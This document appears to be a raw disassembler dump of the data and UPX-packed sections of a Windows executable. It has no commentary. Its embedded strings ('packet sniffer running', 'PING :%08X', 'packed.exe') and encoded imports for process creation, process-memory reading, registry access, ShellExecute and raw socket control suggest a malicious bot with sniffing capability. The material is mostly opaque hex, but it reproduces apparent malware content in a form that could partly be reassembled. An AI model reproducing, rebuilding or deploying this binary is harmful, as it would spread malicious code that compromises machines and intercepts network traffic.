db 2Dh, 20h, 4Ch
db 65h ; e
db 76h, 65h, 6Ch
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aPacketSnifferR db ' packet sniffer running',0
align 10h
dword_41DAC0 dd 6576654Ch, 3003206Ch, 75250234h, 70200203h, 656B6361h
; DATA XREF: sub_41665C+8E�o
dd 6E732074h, 65666669h, 72h, 41DAE4h, 84B6AD89h, 0B8A0BAE6h
dd 91C499ECh, 2 dup(0)
dword_41DAF8 dd 0B1790F4Ch ; DATA XREF: sub_40A9CF+843�r
; UPX0:00416845�r ...
dword_41DAFC dd 6F035C08h ; DATA XREF: UPX0:0041683D�r
dword_41DB00 dd 12E3F4F6h ; DATA XREF: UPX0:00416832�r
dword_41DB04 dd 0A1A8C30Ch ; DATA XREF: UPX0:0041682C�r
dd 35h, 0
off_41DB10 dd offset dword_41DE18 ; DATA XREF: sub_40E618+1C3�r
; sub_40E618+1D5�r ...
align 8
off_41DB18 dd offset dword_41CCF8 ; DATA XREF: sub_40A9CF+7B3�r
; sub_40CF2F+82�r ...
off_41DB1C dd offset nullsub_4 ; DATA XREF: sub_40CF2F+B8�r
dword_41DB20 dd 0 ; DATA XREF: sub_40CF2F+D0�r
; sub_40CF2F+DF�r
dd offset dword_41CCD8
dd offset dword_41CCCC
align 10h
dd offset dword_41CCAC
dd offset nullsub_102
dd 0
dd offset dword_41CC84
dd offset nullsub_103
align 8
dd offset loc_41CC58
dd offset dword_41CC4C
dd 0
dd offset dword_41CC34
dd offset nullsub_104
align 10h
dd offset loc_41CC0C
dd offset nullsub_105
dd 4 dup(0)
dword_41DB78 dd 0D7E6FDC6h, 0F7EBEBF7h, 2 dup(0) ; DATA XREF: sub_40D043:loc_40D31F�o
; sub_40D871:loc_40DCB8�o
dword_41DB88 dd 69702323h, 2323h, 1Eh dup(0) ; DATA XREF: sub_40332B+1A1�o
; sub_4093B6+6C�o ...
byte_41DC08 db 0DAh ; DATA XREF: sub_40D043+28C�r
; sub_40D043+297�o
db 0E1h, 0B1h, 81h
dd 0EBF7BDB8h, 1Eh dup(0)
byte_41DC88 db 0 ; DATA XREF: sub_40D043+2B3�r
; sub_40D043+2BE�o
align 4
dd 1Fh dup(0)
dword_41DD08 dd 3430032Eh, 2036202h, 0 ; DATA XREF: sub_40A9CF:loc_40C4DA�o
; sub_40D871+242�o
dword_41DD14 dd 8BBBA78Eh, 0E6E6E7A4h, 0DA9AA6h, 3Eh dup(0) ; DATA XREF: sub_406A23+2E�o
; sub_406AE7+2E�o
dword_41DE18 dd 80B682D3h, 0E6A7B0BBh, 85DE92B1h, 0BFFEh, 0 ; DATA XREF: UPX1:off_41DB10�o
dword_41DE2C dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: UPX0:00416B0D�o
aEipHasLeftTheE db '- eip has left the endless loop for some reason...',0
align 4
aEntry db 'entry',0 ; DATA XREF: UPX0:00416AE7�o
align 4
aLoop db 'loop',0 ; DATA XREF: UPX0:loc_416AC5�o
align 4
aPing08x db 'PING :%08X',0 ; DATA XREF: UPX0:00416A54�o
align 4
a08xX08x3x08x08 db '%08x%x%08x%3x%08x%08x',0 ; DATA XREF: UPX0:0041684B�o
align 10h
dword_41DEA0 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bh ; DATA XREF: sub_416E4E+15�o
off_41DEB0 dd offset off_4172BC ; DATA XREF: UPX1:off_4172C0�o
; UPX1:004172FC�o ...
align 8
a_?av_com_error db '.?AV_com_error@@',0
align 10h
off_41DED0 dd offset off_4172BC ; DATA XREF: UPX1:off_417308�o
; UPX1:00417344�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dword_41DEE8 dd 0 ; DATA XREF: sub_401856:loc_40186E�r
; sub_401856+21�r ...
dword_41DEEC dd 0 ; DATA XREF: sub_401856:loc_401883�r
; sub_401856+36�r ...
dword_41DEF0 dd 0 ; DATA XREF: sub_401856:loc_401898�r
; sub_401856+4B�r ...
dword_41DEF4 dd 0 ; DATA XREF: sub_401856+3�r
; sub_401856+C�r ...
dd 0
dword_41DEFC dd 0 ; DATA XREF: sub_4018AF+40�r
; sub_4018AF+62�r ...
byte_41DF00 db 0 ; DATA XREF: sub_401981+1BA�o
; sub_402A32+57�r ...
align 8
dword_41DF08 dd 0 ; DATA XREF: sub_40332B+1A�r
; sub_404CBB+1B�r ...
dword_41DF0C dd 0 ; DATA XREF: sub_40332B+B�o
dword_41DF10 dd 77E7C706h ; DATA XREF: sub_403BD3+28�w
; sub_409C36+12�r ...
align 8
dword_41DF18 dd 71C245E0h ; DATA XREF: sub_403BD3+53�w
dword_41DF1C dd 71C243F6h ; DATA XREF: sub_403BD3+66�w
dword_41DF20 dd 71C59904h ; DATA XREF: sub_403BD3+79�w
dword_41DF24 dd 71C453F8h ; DATA XREF: sub_403BD3+8C�w
dword_41DF28 dd 71C2FA86h ; DATA XREF: sub_403BD3+9F�w
dword_41DF2C dd 71C574FAh ; DATA XREF: sub_403BD3+B2�w
dword_41DF30 dd 71C214BAh ; DATA XREF: sub_403BD3+C5�w
dword_41DF34 dd 71C4A1B4h ; DATA XREF: sub_403BD3+D8�w
dword_41DF38 dd 71C59530h ; DATA XREF: sub_403BD3+EB�w
dword_41DF3C dd 71B2ACCBh ; DATA XREF: sub_403BD3+112�w
dword_41DF40 dd 71B22C25h ; DATA XREF: sub_403BD3+125�w
dword_41DF44 dd 71B2A381h ; DATA XREF: sub_403BD3+138�w
dword_41DF48 dd 71B28D0Dh ; DATA XREF: sub_403BD3+14B�w
dword_41DF4C dd 7622A3F4h ; DATA XREF: sub_403BD3+219�w
; sub_408B30+118�r ...
dword_41DF50 dd 5E0C4E7Dh ; DATA XREF: sub_403BD3+1F2�w
; sub_414EF4+6C�r ...
dword_41DF54 dd 71AB33DFh ; DATA XREF: sub_403BD3+16C�w
; sub_403BD3+197�r ...
dword_41DF58 dd 71ABC076h ; DATA XREF: sub_4020C2+DB�r
; sub_403BD3+17F�w ...
dword_41DF5C dd 71AB3A2Ch ; DATA XREF: sub_403BD3+192�w
; sub_403BD3+1A9�r ...
dd 101h dup(0)
dword_41E364 dd 0 ; DATA XREF: sub_4042FB+3�r
; sub_4042FB+20�o
dword_41E368 dd 0 ; DATA XREF: sub_4042FB+12�o
; sub_4042FB:loc_404327�r
align 10h
dword_41E370 dd 76BF1C22h ; DATA XREF: sub_405FA3+46�w
; sub_405FA3+7A�r ...
dword_41E374 dd 76BF1D54h ; DATA XREF: sub_405FA3+59�w
; sub_405FA3+83�r ...
dword_41E378 dd 76BF1E6Ch ; DATA XREF: sub_405FA3+6C�w
; sub_405FA3+8C�r ...
dword_41E37C dd 76BF32DDh ; DATA XREF: sub_405FA3+33�w
; sub_405FA3+71�r ...
dword_41E380 dd 14AEC8h, 0FFFFFFFFh, 5 dup(0) ; DATA XREF: sub_405FA3+4�o
; sub_406041+B�o ...
byte_41E39C db 1 ; DATA XREF: sub_405FA3+95�w
; sub_406041+16�r
align 10h
dword_41E3A0 dd 0 ; DATA XREF: sub_409226+61�w
; sub_409226+77�w ...
align 8
dword_41E3A8 dd 14B000h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_40938F+1A�o
; sub_4095A4+6�o ...
dword_41E3C0 dd 0 ; DATA XREF: sub_40938F+3�w
; sub_4095A4+11�r ...
align 8
dword_41E3C8 dd 863A00h ; DATA XREF: sub_40938F+15�w
; sub_4095A4+57�r ...
dword_41E3CC dd 0 ; DATA XREF: sub_409CB1+6�r
; sub_409DD0+65�w ...
dword_41E3D0 dd 0 ; DATA XREF: sub_409DD0+3F�w
; sub_409DD0+44�r ...
dword_41E3D4 dd 0 ; DATA XREF: sub_409CB1+F6�r
; sub_409DD0+91�w ...
dword_41E3D8 dd 0 ; DATA XREF: sub_409CB1+B9�r
; sub_409DD0+7B�w ...
align 10h
byte_41E3E0 db 0 ; DATA XREF: sub_409DD0+29�r
; sub_409DD0+96�w
align 4
dd 101h dup(0)
byte_41E7E8 db 0 ; DATA XREF: sub_40CF2F+4B�o
; sub_40CF2F+5E�o ...
align 4
dd 5Fh dup(0)
dword_41E968 dd 40h dup(0) ; DATA XREF: sub_40CF2F+E�o
; sub_40CF2F+A6�o ...
dword_41EA68 dd 3 dup(0) ; DATA XREF: sub_40CF2F+23�o
; sub_40CF2F+36�o ...
dword_41EA74 dd 0 ; DATA XREF: sub_40CF25+3�r
; sub_40D366+15�r ...
dd 0
dword_41EA7C dd 0 ; DATA XREF: sub_40E618+49�w
; sub_40E618:loc_40E66D�w
byte_41EA80 db 0 ; DATA XREF: sub_40E979+1D�w
; sub_40E979+46�w ...
align 4
dd 9 dup(0)
dd 3E000000h, 3F000000h, 37363534h, 3B3A3938h, 3D3Ch, 0
dd 2010000h, 6050403h, 0A090807h, 0E0D0C0Bh, 1211100Fh
dd 16151413h, 191817h, 0
db 0
db 1Ah, 1Bh, 1Ch
db 1Dh
db 1Eh, 1Fh, 20h
a_0123 db '!"#$%&',27h,'()*+,-./0123',0
dd 22h dup(0)
byte_41EB84 db 0F2h ; DATA XREF: sub_40ECEB+29�o
; sub_40ECEB+35�o ...
aShmmhNaII db 0Bh,'³èHMMH',0Bh,'½ËëÓ©',0
align 4
dword_41EB98 dd 85E7D1A7h, 0C5FDFDC5h, 0B939B9D1h, 1987FB7Bh, 0
; DATA XREF: sub_40ED6E+29�o
; sub_40ED6E+35�o ...
dword_41EBAC dd 6480A60h ; DATA XREF: sub_4102AE+1D�o
; sub_410318+7�w ...
dword_41EBB0 dd 0CFFBEFF2h ; DATA XREF: sub_4102AE+2D�o
; sub_410318+11�w ...
dword_41EBB4 dd 6086F97Dh ; DATA XREF: sub_4102AE+3D�o
; sub_410318+1B�w ...
dword_41EBB8 dd 12D42A7Fh ; DATA XREF: sub_4102AE+4D�o
; sub_410318+25�w ...
align 10h
byte_41EBC0 db 0F9h ; DATA XREF: sub_41055F+29�o
; sub_41055F+35�o ...
; ---------------------------------------------------------------------------
retn 0E8D9h
; ---------------------------------------------------------------------------
enter 0FFFFD4D4h, 0C8h
retn 0B6F6h
; ---------------------------------------------------------------------------
db 0F6h
; ---------------------------------------------------------------------------
xchg eax, edi
xlat
jmp near ptr byte_41EC79
; ---------------------------------------------------------------------------
align 8
dword_41EBD8 dd 2 dup(0) ; DATA XREF: sub_41113B+7E8�o
dword_41EBE0 dd 0 ; DATA XREF: sub_411DC5+557�o
dword_41EBE4 dd 2 dup(0) ; DATA XREF: sub_411DC5+579�o
dword_41EBEC dd 0 ; DATA XREF: sub_4127D0+9�r
; sub_4127D0+16�w
dword_41EBF0 dd 0 ; DATA XREF: sub_4127D0+BF�w
; sub_4127D0:loc_4128A0�r
dword_41EBF4 dd 2 dup(0) ; DATA XREF: sub_412D4C+3�o
; sub_412E04+7F�o
dword_41EBFC dd 6B636170h, 652E6465h, 6578h, 1Ch dup(0) ; DATA XREF: sub_406E8E+208�o
; sub_407148+172�o ...
db 0
byte_41EC79 db 3 dup(0) ; CODE XREF: UPX1:0041EBCE�j
dd 21h dup(0)
dword_41ED00 dd 0E906B76h ; DATA XREF: sub_40A9CF+838�r
; UPX0:00416909�w
dword_41ED04 dd 5FB8A912h ; DATA XREF: UPX0:00416913�w
dword_41ED08 dd 0D582DCB0h ; DATA XREF: UPX0:0041691D�w
dword_41ED0C dd 6920221Ch ; DATA XREF: UPX0:00416927�w
dword_41ED10 dd 6B636170h, 652E6465h, 6578h, 3Fh dup(0) ; DATA XREF: sub_40A9CF+C3D�o
; sub_40A9CF+C51�o ...
dword_41EE18 dd 40h dup(0) ; DATA XREF: sub_40A9CF+1082�o
; sub_40A9CF+108E�o ...
byte_41EF18 db 0 ; DATA XREF: sub_40D043+FF�r
; sub_40D043+10A�o ...
align 4
dd 1Fh dup(0)
byte_41EF98 db 0 ; DATA XREF: sub_403DF3:loc_403F07�r
; sub_403DF3+11F�o ...
align 4
dd 1Fh dup(0)
dword_41F018 dd 40h dup(0) ; DATA XREF: sub_404279+36�o
; sub_4055E5+746�o ...
byte_41F118 db 0 ; DATA XREF: sub_40A9CF+1F37�o
; sub_40D043:loc_40D0D6�r ...
align 4
dd 3B9h dup(0)
dd 0E0h, 16030h, 74654701h, 73726556h, 456E6F69h, 1004178h
dd 4C746547h, 6C61636Fh, 666E4965h, 100416Fh, 43746553h
dd 65727275h, 6944746Eh, 74636572h, 4179726Fh, 736C0100h
dd 656C7274h, 100416Eh, 57746547h, 6F646E69h, 69447377h
dd 74636572h, 4179726Fh, 72430100h, 65746165h, 656C6946h
dd 47010041h, 69467465h, 6954656Ch, 100656Dh, 46746553h
dd 54656C69h, 656D69h, 74654701h, 74737953h, 69446D65h
dd 74636572h, 4179726Fh, 6F4C0100h, 694C6461h, 72617262h
dd 1004179h, 50746547h, 41636F72h, 65726464h, 1007373h
dd 74697845h, 636F7250h, 737365h, 706F4301h, 6C694679h
dd 1004165h, 4C746547h, 45747361h, 726F7272h, 72570100h
dd 46657469h, 656C69h, 61655301h, 50686372h, 41687461h
dd 72430100h, 65746165h, 65706950h, 65470100h, 72754374h
dd 746E6572h, 636F7250h, 737365h, 74654701h, 706D6F43h
dd 72657475h, 656D614Eh, 43010041h, 74616572h, 6F725065h
dd 73736563h, 50010041h, 4E6B6565h, 64656D61h, 65706950h
dd 65470100h, 69784574h, 646F4374h, 6F725065h, 73736563h
dd 65520100h, 69466461h, 100656Ch, 4D746547h, 6C75646Fh
dd 6E614865h, 41656C64h, 65470100h, 646F4D74h, 46656C75h
dd 4E656C69h, 41656D61h, 704F0100h, 72506E65h, 7365636Fh
dd 52010073h, 50646165h, 65636F72h, 654D7373h, 79726F6Dh
dd 6C530100h, 706565h, 72655401h, 616E696Dh, 72506574h
dd 7365636Fh, 43010073h, 65736F6Ch, 646E6148h, 100656Ch
dd 46746553h, 41656C69h, 69727474h, 65747562h, 1004173h
dd 656C6544h, 69466574h, 41656Ch, 636F4C01h, 72466C61h
dd 1006565h, 61657243h, 68546574h, 64616572h, 6E550100h
dd 5670616Dh, 4F776569h, 6C694666h, 4D010065h, 69567061h
dd 664F7765h, 656C6946h, 72430100h, 65746165h, 656C6946h
dd 7070614Dh, 41676E69h, 6C470100h, 6C61626Fh, 6F6D654Dh
dd 74537972h, 73757461h, 65470100h, 73694474h, 6572466Bh
dd 61705365h, 78456563h, 47010041h, 72447465h, 54657669h
dd 41657079h, 65470100h, 63695474h, 756F436Bh, 100746Eh
dd 72657551h, 72655079h, 6D726F66h, 65636E61h, 71657246h
dd 636E6575h, 51010079h, 79726575h, 66726550h, 616D726Fh
dd 4365636Eh, 746E756Fh, 1007265h, 61427349h, 646F4364h
dd 72745065h, 65540100h, 6E696D72h, 54657461h, 61657268h
dd 49010064h, 6974696Eh, 7A696C61h, 69724365h, 61636974h
dd 6365536Ch, 6E6F6974h, 65470100h, 72754374h, 746E6572h
dd 636F7250h, 49737365h, 45010064h, 7265746Eh, 74697243h
dd 6C616369h, 74636553h, 6E6F69h, 70754401h, 6163696Ch
dd 61486574h, 656C646Eh, 65530100h, 72724574h, 6F4D726Fh
dd 1006564h, 61657243h, 754D6574h, 41786574h, 736C0100h
dd 70637274h, 1004179h, 7274736Ch, 6E797063h, 47010041h
dd 6E457465h, 6F726976h, 6E656D6Eh, 72615674h, 6C626169h
dd 1004165h, 7274736Ch, 41706D63h, 654C0100h, 43657661h
dd 69746972h, 536C6163h, 69746365h, 6E6Fh, 0EDh, 16000h
dd 67655201h, 6D756E45h, 756C6156h, 1004165h, 44676552h
dd 74656C65h, 6C615665h, 416575h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 51676552h, 79726575h, 756C6156h
dd 41784565h, 65520100h, 74655367h, 756C6156h, 41784565h
dd 65520100h, 65724367h, 4B657461h, 78457965h, 47010041h
dd 73557465h, 614E7265h, 41656Dh, 79724301h, 65527470h
dd 7361656Ch, 6E6F4365h, 74786574h, 72430100h, 47747079h
dd 61526E65h, 6D6F646Eh, 72430100h, 41747079h, 69757163h
dd 6F436572h, 7865746Eh, 1004174h, 43676552h, 65736F6Ch
dd 79654Bh, 0FA00h, 1611400h, 695F0100h, 616F74h, 74735F01h
dd 63696E72h, 100706Dh, 7878435Fh, 6F726854h, 63784577h
dd 69747065h, 1006E6Fh, 74313F3Fh, 5F657079h, 6F666E69h
dd 41554040h, 5A584045h, 5F5F0100h, 46787843h, 656D6172h
dd 646E6148h, 72656Ch, 6D656D01h, 65766F6Dh, 74730100h
dd 79706372h, 725F0100h, 72746Fh, 6F725F01h, 1006C74h
dd 6E73765Fh, 6E697270h, 1006674h, 636D656Dh, 100706Dh
dd 6F6C6F74h, 726577h, 72747301h, 706D63h, 69727001h, 66746Eh
dd 323F3F01h, 50415940h, 40495841h, 3F01005Ah, 5940333Fh
dd 41505841h, 5A4058h, 70737601h, 746E6972h, 5F010066h
dd 69676562h, 7268746Eh, 65646165h, 5F010078h, 65637865h
dd 685F7470h, 6C646E61h, 337265h, 69656301h, 5F01006Ch
dd 6C6F7466h, 78650100h, 1007469h, 6C616572h, 636F6Ch
dd 72747301h, 706D636Eh, 735F0100h, 6972706Eh, 66746Eh
dd 72747301h, 727473h, 63737301h, 666E61h, 6F746101h, 66010069h
dd 6B656573h, 72660100h, 646165h, 706F6601h, 1006E65h
dd 6F6C6366h, 1006573h, 69727766h, 1006574h, 6C657466h
dd 7301006Ch, 61637274h, 6D010074h, 65736D65h, 63010074h
dd 6B636F6Ch, 70730100h, 746E6972h, 73010066h, 636E7274h
dd 1007970h, 636D656Dh, 1007970h, 65657266h, 616D0100h
dd 636F6C6Ch, 74730100h, 6E656C72h, 735F0100h, 6D637274h
dd 6970h, 105h, 161C8h, 0C8FFh, 112h, 161D0h, 65685301h
dd 78456C6Ch, 74756365h, 4165h, 11Eh, 161D8h, 74654701h
dd 65726F46h, 756F7267h, 6957646Eh, 776F646Eh, 73490100h
dd 72616843h, 68706C41h, 6D754E61h, 63697265h, 77010041h
dd 69727073h, 4166746Eh, 65470100h, 6E695774h, 54776F64h
dd 41747865h, 69460100h, 6957646Eh, 776F646Eh, 53010041h
dd 4D646E65h, 61737365h, 416567h, 12900h, 161F400h, 4FF00h
dd 0FF0097FFh, 16FF0001h, 15FF00h, 0FF0002FFh, 5FF0013h
dd 0AFF00h, 0FF0017FFh, 33FF000Ch, 6FFF00h, 0FF0038FFh
dd 3FF0012h, 70FF00h, 0FF0009FFh, 6FF0034h, 0BFF00h, 0FF0010FFh
dd 14FF0008h, 74FF00h, 10011FFh, 49415357h, 6C74636Fh
dd 39FF00h, 0FF0073FFh, 0Dh, 50000000h, 4C000045h, 0F0000301h
dd 463901h, 0
dd 0E0000000h, 0B010F00h, 601h, 160h, 82h, 0F1000000h
dd 167h, 10h, 170h, 4000h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 200h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 0C8000000h, 0A0000173h, 15h dup(0)
dd 70000170h, 2, 5 dup(0)
dd 2E000000h, 74786574h, 0E7000000h, 15Fh, 10h, 160h, 4
dd 2 dup(0)
dd 20000000h, 2EE00000h, 74616472h, 4C000061h, 0Eh, 170h
dd 10h, 164h, 2 dup(0)
dd 40000000h, 2E400000h, 61746164h, 98000000h, 71h, 180h
dd 60h, 174h, 2 dup(0)
dd 40000000h, 0C00000h, 0D80001F0h, 3000176h, 340001F7h
dd 8101820h, 64EEBA04h, 0C3F800D3h, 3EC07F0h, 0A69A69E4h
dd 0D0D8E069h, 0F99DC0C8h, 0B0B8A69Ah, 3C39740h, 0D74D3494h
dd 3B888C34h, 0D36C7480h, 64D34D34h, 50545C60h, 4EEBA69Ah
dd 3B380348h, 0AE202830h, 1869A77Bh, 79714h, 0E99CD98Fh
dd 3C2F8CCh, 0C29300E8h, 9D34D34Dh, 0C4D0DC03h, 4D34ACB8h
dd 8CA034D3h, 17606878h, 30D74D26h, 6720283Fh, 0D74D41DFh
dd 271C244Dh, 8140318h, 36E74D34h, 32FC1FCh, 0D3DCE4F0h
dd 0D8D34D35h, 1FCCD0D4h, 34D34DC8h, 0B0B8C04Dh, 34909CA8h
dd 8434D34Dh, 6068707Ch, 0D967B669h, 98589250h, 1050440Bh
dd 48AEC25Eh, 67C14003h, 0DDF3C138h, 2CBBB085h, 0FBC1240Fh
dd 18140F1Ch, 375D3DDh, 0C0041B0Ch, 8C13C0ABh, 0F05DD74Dh
dd 0DC03E80Fh, 3423C0D0h, 0CC2EEBDDh, 7FF500Fh, 34D3B844h
dd 3B0D74Dh, 9098A0A8h, 5D3CD180h, 0C088578Ch, 8EF853C0h
dd 784B5630h, 0CF74C0A7h, 0AF53C96Ch, 488FABC0h, 0D3BDD34Dh
dd 389B33F0h, 0C65D2830h, 1C133BA6h, 47FC00Ch, 0D8DC9DD7h
dd 8BBFF80Bh, 7D4BFE8h, 0BBB103D0h, 0C4CC4D8Ch, 0BB09BBFh
dd 5D8CBFA4h, 0A0A38577h, 9403981Bh, 8058AFBFh, 0B8CBBB1h
dd 80B7BF84h, 9F0B78B7h, 0B7736170h, 77616C62h, 639B403h
dd 6B2F70E3h, 0B30B6169h, 684CA5A0h, 2BFB6133h, 2B6F3D96h
dd 6F6C7173h, 7DF05011h, 462600Eh, 0B3207h, 0C0AE7Ah, 0C02813FCh
dd 5801454Eh, 0D9BB137Fh, 1D33D9B2h, 6D6F070Bh, 732D96EBh
dd 870F1756h, 0D5FE6B65h, 75D50ACh, 766F6C12h, 9BC8F865h
dd 6E6F6D7Fh, 6C737965h, 74697475h, 16206863h, 755F3F7Ah
dd 788BCA63h, 0FB3B0D9Bh, 673365E7h, 78070B4Eh, 71B6DB6Bh
dd 237A1A77h, 71701500h, 0B9417A61h, 420B7407h, 0C9E4F207h
dd 7807FFEEh, 396B3270h, 0F0B92538h, 651B546Ah, 8A3D506Dh
dd 63470BCDh, 16200D7Eh, 0EF0BC7ECh, 735AD6E8h, 90A79951h
dd 0AE7BAA27h, 4D62A835h, 1983CBDDh, 72F70A16h, 70F7C474h
dd 0F6602549h, 6E17078Bh, 0CE7AEB75h, 61B5ACDAh, 46C98D0Ah
dd 0DD606D13h, 2B0E1DD9h, 35B47473h, 338A1707h, 2D3134C8h
dd 8D7E6572h, 0F6217362h, 61371579h, 56218264h, 6543ED02h
dd 243B0123h, 0B30C220h, 92E4B60Ch, 70000h, 9C9C9B9Ch
dd 7030000h, 0E6B70A10h, 70277A0Bh, 8BEB4F77h, 7DECC3Dh
dd 0F61EB27h, 2D97151Eh, 0BE900A1h, 0E7381731h, 7032B22h
dd 0B737840Bh, 211FBD05h, 5C0D0974h, 43081E44h, 75636FE1h
dd 53175704h, 0D0FC2A0Bh, 5C736DDDh, 2B6B2C41h, 73ECBB5Bh
dd 0ED305C20h, 2441376Dh, 741AC6Ah, 4164725Ch, 63F30B68h
dd 0D13C20Bh, 376D65D8h, 270011h, 923172A1h, 934B571Fh
dd 9F60325Bh, 630B64BCh, 0F68EC223h, 3131B9Eh, 0AF666622h
dd 2346ABB7h, 7729C315h, 0CE4A056Eh, 75173E15h, 65DD5292h
dd 0D629878Fh, 1B865B12h, 7551C39Eh, 0F969AB11h, 44BB9A49h
dd 636F205Dh, 8CDA6569h, 86C38CFh, 0CF71613Ch, 6A696323h
dd 73B5373Ch, 6269AF12h, 0F6F636Dh, 0AB775262h, 0B37B612Fh
dd 1E92C2h, 0B58F8BF3h, 6F367416h, 13266769h, 2EF6D51Ch
dd 0A3707533h, 2B126EA2h, 5F9DA39Bh, 6B3335CBh, 0B11AD479h
dd 87370759h, 68C5AC65h, 28C455EDh, 0F7179FABh, 75E336B6h
dd 73184190h, 0D6EFCB8Fh, 0E7193466h, 72622293h, 0C1B9A911h
dd 73759B76h, 0B3A36507h, 0A44284BEh, 2DF6B6Ah, 0A46F4E17h
dd 826F6A76h, 0D71769DFh, 0CE137361h, 1F5A66E7h, 3B086A16h
dd 175B8218h, 0E667626Fh, 0B5CF7C2Fh, 415983D3h, 0D968DF04h
dd 65B606F0h, 656B070Bh, 0B6015272h, 65033B37h, 20A690BBh
dd 0C0FB115h, 0A0578423h, 0F67875CCh, 0BDEC6F06h, 9A756CC7h
dd 7700353h, 0E41686B0h, 74C4F173h, 0D818570Bh, 1B727B36h
dd 52FD406Dh, 740FB2E4h, 2D20311Ah, 8C060A0Dh, 3207B262h
dd 60A42DE3h, 54460A42h, 4A0542h, 23FBFF21h, 0A38A325Bh
dd 2D364B87h, 0F5FFFA0Bh, 20332078h, 686620D1h, 32303120h
dd 0DC4A2034h, 5BB914BFh, 123A3067h, 7772648Ch, 6E907278h
dd 72246D91h, 42D2827h, 920DAC0Dh, 0D8F65E26h, 35316B83h
dd 0CFA07B30h, 33318F13h, 230F142h, 0D702501Bh, 4B6C2DD9h
dd 1F022C13h, 0E4BB5620h, 32342FB1h, 0BD84B35h, 8F5F3015h
dd 103E4BFDh, 37350C41h, 222F2220h, 2B02017h, 60D8F202h
dd 0E0873173h, 0E4F60A6Bh, 0A04FCF92h, 9833162Fh, 92E16310h
dd 33335F23h, 20C2A831h, 0DE20C6A3h, 0A7333019h, 0C20C5931h
dd 0CB2FD3CDh, 44803E0Fh, 46E327BDh, 23205054h, 0E6BA952Ah
dd 9DB8056Dh, 0D55D72Fh, 0FB0130BBh, 604A976Ch, 6B04A120h
dd 8E1780Bh, 0E0F6008h, 241B0C0h, 86444B57h, 69544828h
dd 6DA08393h, 5C89749Eh, 0B6409B2Fh, 54748F28h, 0D812298Bh
dd 1FCF1400h, 15AA278Ah, 5EDC811Ch, 0C119FE80h, 0FF3174FFh
dd 0EBF9E200h, 8FE6E805h, 8B64DB33h, 0F8833043h, 70A0889Bh
dd 788BAD1Ch, 0FB99E808h, 6C8552FFh, 5C8B3C5Fh, 0DF03783Bh
dd 205B8B53h, 0FA374205h, 4C383BFh, 0F703338Bh, 32ACC933h
dd 0D505C1B9h, 0FFFF6FFCh, 0CA2BF675h, 2B58E975h, 5EEBD1D8h
dd 28245E03h, 8B0B8B66h, 0DF031C5Eh, 0E078028Bh, 5EC703BFh
dd 5EE0FF5Bh, 1268A868h, 0E46FFD14h, 6E92BA54h, 0D6FF8404h
dd 0DBA4F88Bh, 0EC78A006h, 83BAA453h, 0C47F0057h, 0AC15685Ah
dd 8B1C0568h, 0F6F98BD4h, 6AD8FFDBh, 0BA535210h, 5A603063h
dd 2B4501Ah, 0C5550h, 8E26058h, 0BF609EC0h, 0B7B3E543h
dd 536C2FCBh, 0A69000AFh, 0B95040C2h, 0E6EC3B7Ah, 0A173CCEEh
dd 69D31009h, 0C033202Ah, 25BBBCC7h, 5443AF02h, 7972328Ch
dd 0EDDDB019h, 7D8166BFh, 75111102h, 220406EDh, 0AAE47500h
dd 96C010BDh, 8B370015h, 0B59FEA75h, 0EB392FFh, 45D89ECh
dd 894F1989h, 61451465h, 1BC7646Dh, 21A171CAh, 8DF8FD80h
dd 6CA25504h, 781C4128h, 7745E066h, 0C5D822F8h, 0A30D7B90h
dd 14643DB0h, 2E18458Fh, 69BE02h, 0C03B7F7Eh, 3DBA1836h
dd 495C6BD3h, 0C268401Ch, 3702A158h, 1700A60Ch, 438ABECh
dd 0FD9F4DFFh, 8B22A0EFh, 577441C8h, 104D8D53h, 0BA1C1E51h
dd 777F97B9h, 0CBF5BEE5h, 0C5EB401Bh, 0C5935C0Fh, 0EE446A9Dh
dd 0C96FED0Bh, 8BFC8BE0h, 654BABD7h, 0FDE2AB59h, 0DFE5FF40h
dd 505252ECh, 0F12C7600h, 0FE582694h, 0BA5053C7h, 63DFD601h
dd 0DE34DACBh, 53963D0Bh, 0C7627CFh, 7F91FB77h, 31568583h
dd 46BABA07h, 9C10Ch, 0AEA7E3h, 13E66AC7h, 1BCCF81Ch, 0D20CD203h
dd 0CCD80B7Ch, 0CD2A0ACh, 78840CD2h, 0DF14C58h, 28340CD2h
dd 7CC070Ch, 274594F9h, 0DAEAF6CAh, 0F60FA68Ah, 80B0FFFFh
dd 0ACBCBDBBh, 99C590B1h, 0C99ABFF1h, 86F7B191h, 0FA27A0ADh
dd 3E5FD0EAh, 91630018h, 0A191B0A3h, 0ACDF93AAh, 9EFF63EAh
dd 88DAB2E5h, 17B4AD9Ah, 0DBEFF5CEh, 0FFFFE6B7h, 0A9BB941Fh
dd 0A1FAA489h, 0DA97B2BAh, 86A4A4C2h, 0B8B28BD3h, 0BCA1A084h
dd 63C93FFFh, 0E0F0CB2Bh, 87BEA397h, 0A9BAFAA7h, 9FC29FA5h
dd 0D9C97FE5h, 0C381BEFFh, 0C6ACB590h, 77A0B1A6h, 0BEAB8EFBh
dd 0AAE1BA8Dh, 0B6FAFFFEh, 0DD95A3A4h, 81B2FE82h, 0BAA69BD5h
dd 265BC79Bh, 0FB67487Bh, 0C68DA3EBh, 0B583B26Eh, 0B1A0A77Fh
dd 0F4D88E92h, 0DCEA737Ah, 0EDFFB0EBh, 90AAAB7Fh, 0A6B1B1BCh
dd 0F3C399ECh, 9DC281A2h, 0BC8DB7ECh, 0F178001Bh, 73621345h
dd 0C0B00C88h, 906C0327h, 2B6A6001h, 9C45FF24h, 9D0D7589h
dd 0FA85B6A1h, 213C8438h, 49ECF1C8h, 7F90306h, 3903C15Bh
dd 98ADA797h, 95BCA0A9h, 0CDC8539Dh, 0B52F6h, 5A0136D0h
dd 0B155070Eh, 98D52E78h, 70414F29h, 587372Fh, 70B66D0h
dd 0EC2C2D52h, 4949F014h, 13E72F53h, 3847AABCh, 3A151Fh
dd 1962654Fh, 2FC64B05h, 2A58288Dh, 8353C178h, 45302A6Eh
dd 0ABA10CBh, 0E148E126h, 1204D2Eh, 9BB940A2h, 0B03BF67Dh
